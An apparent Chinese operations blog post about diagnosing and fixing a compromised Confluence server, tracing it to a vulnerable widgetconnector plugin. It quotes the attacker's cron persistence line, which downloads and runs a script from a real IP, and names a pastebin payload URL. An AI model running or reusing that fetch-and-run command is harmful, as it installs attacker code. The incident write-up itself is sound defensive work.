运维那些事wiki突然无妨访问,重启服务器过段时间也挂了
故障排除
故障发生之时的第一感觉就是 Confluence 资源不够?但仔细一想,也没有两个人在使用啊。于是查看了一下进程:
Confluence 本该只有两个进程运行,现在只剩下一个本身的,而 Confluence 的用户却运行了一堆乱七八糟的进程。
使用 top 命令查看系统资源占用:
有一个进程巨特么占用 CPU,但是 COMMAND 却没有。通过 PID 可以看出,这个进程就是之前的 /boot/vmlinuz
网上去搜索相关进程的信息,说什么内核进程。当时想,难道内核出 BUG 了?这可咋整,不会需要升级内核吧。
出于懒,先将应用启动起来,让别人先用着吧。可就在这时,神奇的一幕发生了,我 X,服务居然启动不起来了。
再次通过 ps 查看进程,发现又出现了一些奇怪的进程正在执行:
一个 curl 一个 wget,而特么的操作都是去一个 51 的 IP 下载文件,百度这个 IP:
眉头一皱,渐渐的意识到这件事情并不这么简单,这是在搞事情啊。
出于本能,第一步要做的事情,就是找出这些文件,先删除,并且不让他再去下载。
于是我将 curl 和 wget 改为只有 root 用户能够使用。
chmod 700 /usr/bin/wget chmod 700 /usr/bin/curl
然后便是查定时任务,因为之前有过被攻击的经验,这些 B 都喜欢在你机器上面添加定时任务。
su - confluence
crontab -l
果然,在定时任务里面有一条 curl 操作,每隔 5 分钟搞一次,还用了 base64 编码。
*/5 * * * * /usr/bin/wget -q -O /tmp/seasame http://51.38.133.232:80 && bash /tmp/seasame
把这些都删除,顺便去下载了那个脚本,发现他在 /tmp 目录下存放了很多文件,直接全部给他先删除。
然后满心欢喜的启动 Confluence。成功跑起来了。心里还有点小得意。
本以为故事到这里就应该告一段落了,然鹅,这才刚刚开始。
在接下来的一天里,Confluence 一直处于不稳定状态,时不时就挂掉。有时十几分钟,有时半个小时,问题来了,会不会是这台机器的原因?
那还能咋整,迁移呗。于是在一台新的机器上重启部署好服务,将数据重新导入,一且顺顺利利。但没过多久,服务器再度出现上面的症状。
这时心里一万头草泥马奔涌而过。用之前的方法处理,但又一个新的问题诞生了。同时,一个新的域名出现在了我的世界。
pastebin.com
经过一番了解,这是一个可以用户匿名发布纯文本的网站,发布完成以后,文件可以生成一个链接~~~~
于是,接下来的战斗都围绕着类似于这样的地址做斗争:
https://pastebin.com/raw/B5BTS5fm
打开网站,将文件里面 base64 部分解密:
而最终斗争方法包括但不限于修改 curl,wget 权限,修改 DNS 解析等等等等。
127.0.0.1 pastebin.com
结果一番折腾,并没有什么卵用,Confluence 还是隔一段时间就挂掉。为此还专门写了个定时任务让他检测重启。
#!/bin/bash ################################################################# # Confluence 状态检查 ################################################################# SERVICE_STATUS=$(ps aux | grep "/opt/atlassian/confluence/confluence-6.9" | grep -v grep | wc -l) if [[ ${SERVICE_STATUS} -ne 2 ]]; then echo "$(date '+%Y-%m-%d %H:%M:%S') confluence is not running!\n" >>/tmp/confluence_restart.log echo "$(date '+%Y-%m-%d %H:%M:%S') confluence restart!\n" >>/tmp/confluence_restart.log /etc/init.d/confluence restart & fi
日志里面似乎也没啥实质性的东西。全是类似于以下错误,这说明是从程序内部发起的,这可咋整:
org.apache.velocity.exception.ResourceNotFoundException: Unable to find resource 'https://pastebin.com/raw/B5BTS5fm' ......................... java.lang.RuntimeException: org.apache.catalina.connector.ClientAbortException: java.io.IOException: Broken pipe .........................
我把这些地址都让他不能使用了,总不会出乱子吧,不能访问就不能访问呗。
再后来,通过 JAVA 同事点醒,说的是这样的请求失败会造成程序阻塞。我 X,难道这就是方向了?
于是百度关键词,最终在两篇文章中看到了类似的问题。
一篇是漏洞说明:
https://yq.aliyun.com/articles/698490
一篇是问题解决:
https://yq.aliyun.com/articles/698056
最终办法
widgetconnector-xxx.jar 3.1.4 之前的版本存在该漏洞,所以我们可以换成官网新的:
https://packages.atlassian.com/maven-public/com/atlassian/confluence/extra/widgetconnector/widgetconnector/3.1.4/widgetconnector-3.1.4.jar
删除旧版本的 jar 包,换成新版本,具体目录:
confluence安装目录/confluence/WEB-INF/atlassian-bundled-plugins/
然后重启 confluence,为了更安全,我们可以配合之前的修改 curl 和 wget 权限,修改 DNS 解析使用。
